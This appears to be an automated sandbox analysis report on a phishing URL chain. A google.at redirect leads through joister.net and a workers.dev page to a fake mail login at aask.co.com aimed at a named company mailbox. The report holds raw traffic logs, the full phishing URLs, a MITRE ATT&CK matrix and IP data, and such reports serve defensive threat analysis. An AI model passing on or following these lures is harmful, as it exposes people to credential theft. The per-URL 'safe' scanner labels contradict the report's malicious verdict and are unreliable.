Source: global trafficHTTP traffic detected: GET /mail/?login_hint=info%40acaglobal.com HTTP/1.1Host: aask.co.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=2gi159Ei5Q4n; qPdM.sig=jv1uXA6a0I0yiNlNstBvmVMGIMI
Source: global trafficHTTP traffic detected: GET /tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29t HTTP/1.1Host: joister.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.at
Source: global trafficDNS traffic detected: DNS query: joister.net
Source: global trafficDNS traffic detected: DNS query: 2c079db7.df34542e8ba91dbfaec98ed5.workers.dev
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: moderntoolbc.org
Source: global trafficDNS traffic detected: DNS query: aask.co.com
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/983776855:1736379108:IMxQVsLwXGlZd6n2Z41p0MdEOBPL-IrpzZlTwr2AUq0/8ff01048fb6d4364/R_rTQntoF2VLgYZkDUVyN5HYUuUJHQ5sQpdDYboamyI-1736379951-1.1.1.1-8HJ56pYygoOERHrUddPOUm5UWJPLWIxfd21ZbdJVLTboWU.17jbFjn_jHtL9eDOz HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3312sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: R_rTQntoF2VLgYZkDUVyN5HYUuUJHQ5sQpdDYboamyI-1736379951-1.1.1.1-8HJ56pYygoOERHrUddPOUm5UWJPLWIxfd21ZbdJVLTboWU.17jbFjn_jHtL9eDOzsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/sr46z/0x4AAAAAAA4FpD7uVAQN4KLZ/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 23:45:54 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 9TEzuN1BgHLXQTx2FBgIlbe9BPAfSheFgD4=$sp0snGtoh0k4LR3hServer: cloudflareCF-RAY: 8ff01059aab90f53-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 23:45:57 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: Y/jnf01+F/QUteOAu1AIVc9z0szHhBSXfd8=$aQRFxP9bn1+3Yau9cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8ff0106e5ea672a1-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 23:46:01 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: dNPo6i1PpCcg4Okf0I2pHETPhYkSl3uoWKA=$VIRASkB6PQxJw/ieServer: cloudflareCF-RAY: 8ff0108a1e14de98-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_64.1.drString found in binary or memory: https://aask.co.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2Fhc2suY28uY2
Source: chromecache_67.1.dr, chromecache_60.1.dr, chromecache_61.1.dr, chromecache_66.1.drString found in binary or memory: https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback
Source: chromecache_60.1.dr, chromecache_61.1.drString found in binary or memory: https://moderntoolbc.org/?alqrdsrq
Source: chromecache_66.1.drString found in binary or memory: https://moderntoolbc.org/?alqrdsrq&qrc=info
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: classification engineClassification label: mal48.win@22/23@24/12
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1956,i,10359304098874656515,12441451317658416628,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.at/url?sa==ChR6Fb4oMA7qoNPeAF0HryTWGOi&rct=mCcPfNgQLHn7TqSCLwLAghdNeRqdmhaOmrXNGpkofpekJnfvmVMTgxKB7tJBUVJOPR&sa=t&url=amp/joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29t"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1956,i,10359304098874656515,12441451317658416628,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://www.google.at/url?sa==ChR6Fb4oMA7qoNPeAF0HryTWGOi&rct=mCcPfNgQLHn7TqSCLwLAghdNeRqdmhaOmrXNGpkofpekJnfvmVMTgxKB7tJBUVJOPR&sa=t&url=amp/joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29t0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://moderntoolbc.org/?alqrdsrq&qrc=info0%Avira URL Cloudsafe
https://aask.co.com/mail/?login_hint=info%40acaglobal.com0%Avira URL Cloudsafe
https://aask.co.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2Fhc2suY28uY20%Avira URL Cloudsafe
https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev/favicon.ico0%Avira URL Cloudsafe
https://moderntoolbc.org/?alqrdsrq0%Avira URL Cloudsafe
https://aask.co.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2Fhc2suY28uY29tLyIsImRvbWFpbiI6ImFhc2suY28uY29tIiwia2V5IjoiMmdpMTU5RWk1UTRuIiwicXJjIjoiaW5mb0BhY2FnbG9iYWwuY29tIiwiaWF0IjoxNzM2Mzc5OTYzLCJleHAiOjE3MzYzODAwODN9.9mfmPJ6Tz293gVpDft9Bh8PbCFN6r0rJETWVrutJxQo0%Avira URL Cloudsafe
https://moderntoolbc.org/?alqrdsrq=2c501db8a0abfeaec0044cc37e4ba615f256710ed6b5e6c0c3ac509d713b24ad0c609db15d0c265c77843f8250dae7252fd1caf08944af6274852154f68f1cee&qrc=info%40acaglobal.com0%Avira URL Cloudsafe
https://aask.co.com/?qrc=info%40acaglobal.com0%Avira URL Cloudsafe
https://joister.net/favicon.ico0%Avira URL Cloudsafe
https://moderntoolbc.org/?alqrdsrq&qrc=info@acaglobal.com0%Avira URL Cloudsafe
http://joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29t0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
moderntoolbc.org
194.87.71.235
truefalse
    high
    challenges.cloudflare.com
    104.18.95.41
    truefalse
      high
      2c079db7.df34542e8ba91dbfaec98ed5.workers.dev
      104.21.32.1
      truefalse
        high
        www.google.com
        142.250.185.196
        truefalse
          high
          joister.net
          120.138.96.3
          truefalse
            high
            aask.co.com
            194.87.71.235
            truefalse
              unknown
              www.google.at
              142.250.184.195
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/983776855:1736379108:IMxQVsLwXGlZd6n2Z41p0MdEOBPL-IrpzZlTwr2AUq0/8ff01048fb6d4364/R_rTQntoF2VLgYZkDUVyN5HYUuUJHQ5sQpdDYboamyI-1736379951-1.1.1.1-8HJ56pYygoOERHrUddPOUm5UWJPLWIxfd21ZbdJVLTboWU.17jbFjn_jHtL9eDOzfalse
                  high
                  https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev/favicon.icotrue
                  • Avira URL Cloud: safe
                  unknown
                  https://aask.co.com/mail/?login_hint=info%40acaglobal.comfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                    high
                    https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev/?email=info@acaglobal.comfalse
                      unknown
                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/sr46z/0x4AAAAAAA4FpD7uVAQN4KLZ/auto/fbE/normal/auto/false
                        high
                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8ff01048fb6d4364/1736379953254/769054fa8dcecaecb9960e2b63b2bfa4fdb2c1a032f5b46001c82e1ade1b6212/4HoZ_aEiJdqpGNwfalse
                          high
                          https://challenges.cloudflare.com/turnstile/v0/g/849bfe45bf45/api.jsfalse
                            high
                            https://joister.net/favicon.icofalse
                            • Avira URL Cloud: safe
                            unknown
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ff01048fb6d4364&lang=autofalse
                              high
                              https://aask.co.com/?qrc=info%40acaglobal.comfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://moderntoolbc.org/?alqrdsrq=2c501db8a0abfeaec0044cc37e4ba615f256710ed6b5e6c0c3ac509d713b24ad0c609db15d0c265c77843f8250dae7252fd1caf08944af6274852154f68f1cee&qrc=info%40acaglobal.comfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://aask.co.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2Fhc2suY28uY29tLyIsImRvbWFpbiI6ImFhc2suY28uY29tIiwia2V5IjoiMmdpMTU5RWk1UTRuIiwicXJjIjoiaW5mb0BhY2FnbG9iYWwuY29tIiwiaWF0IjoxNzM2Mzc5OTYzLCJleHAiOjE3MzYzODAwODN9.9mfmPJ6Tz293gVpDft9Bh8PbCFN6r0rJETWVrutJxQofalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.google.at/url?sa==ChR6Fb4oMA7qoNPeAF0HryTWGOi&rct=mCcPfNgQLHn7TqSCLwLAghdNeRqdmhaOmrXNGpkofpekJnfvmVMTgxKB7tJBUVJOPR&sa=t&url=amp/joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29tfalse
                                high
                                https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                  high
                                  https://joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29tfalse
                                    unknown
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ff01048fb6d4364/1736379953255/TqpTBbsANyb-yvefalse
                                      high
                                      https://moderntoolbc.org/?alqrdsrq&qrc=info@acaglobal.comfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29tfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.google.at/amp/joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29tfalse
                                        high
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://aask.co.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2Fhc2suY28uY2chromecache_64.1.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://moderntoolbc.org/?alqrdsrqchromecache_60.1.dr, chromecache_61.1.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://moderntoolbc.org/?alqrdsrq&qrc=infochromecache_66.1.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        142.250.184.195
                                        www.google.atUnited States
                                        15169GOOGLEUSfalse
                                        104.21.32.1
                                        2c079db7.df34542e8ba91dbfaec98ed5.workers.devUnited States
                                        13335CLOUDFLARENETUSfalse
                                        104.18.94.41
                                        unknownUnited States
                                        13335CLOUDFLARENETUSfalse
                                        104.21.64.1
                                        unknownUnited States
                                        13335CLOUDFLARENETUStrue
                                        104.18.95.41
                                        challenges.cloudflare.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        194.87.71.235
                                        moderntoolbc.orgRussian Federation
                                        213163IT-GROUPRUfalse
                                        239.255.255.250
                                        unknownReserved
                                        unknownunknownfalse
                                        142.250.185.196
                                        www.google.comUnited States
                                        15169GOOGLEUSfalse
                                        120.138.96.3
                                        joister.netIndia
                                        45194SIPL-ASSysconInfowayPvtLtdINfalse
                                        IP
                                        192.168.2.16
                                        192.168.2.7
                                        192.168.2.6
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1586350
                                        Start date and time:2025-01-09 00:45:08 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 3m 31s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                        Sample URL:https://www.google.at/url?sa==ChR6Fb4oMA7qoNPeAF0HryTWGOi&rct=mCcPfNgQLHn7TqSCLwLAghdNeRqdmhaOmrXNGpkofpekJnfvmVMTgxKB7tJBUVJOPR&sa=t&url=amp/joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29t
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:12
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal48.win@22/23@24/12
                                        EGA Information:Failed
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 142.250.186.35, 64.233.166.84, 172.217.18.14, 142.250.186.78, 142.250.184.206, 142.250.185.142, 142.250.185.238, 142.250.186.46, 142.250.181.238, 142.250.184.227, 142.250.185.78, 142.250.185.206, 23.56.254.164, 4.175.87.197
                                        • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: https://www.google.at/url?sa==ChR6Fb4oMA7qoNPeAF0HryTWGOi&rct=mCcPfNgQLHn7TqSCLwLAghdNeRqdmhaOmrXNGpkofpekJnfvmVMTgxKB7tJBUVJOPR&sa=t&url=amp/joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29t
                                        No simulations
                                        No context
                                        No context
                                        No context
                                        No context
                                        No context
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 22:45:45 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2673
                                        Entropy (8bit):3.9892317640217088
                                        Encrypted:false
                                        SSDEEP:48:8WOdlcTFAizH6idAKZdA1FehwiZUklqehHy+3:8dc5hsAy
                                        MD5:C96FD69C4A67B51C3B992CB9E319A9B4
                                        SHA1:2387E2536E95066E86579EE86C4481BF7AE42257
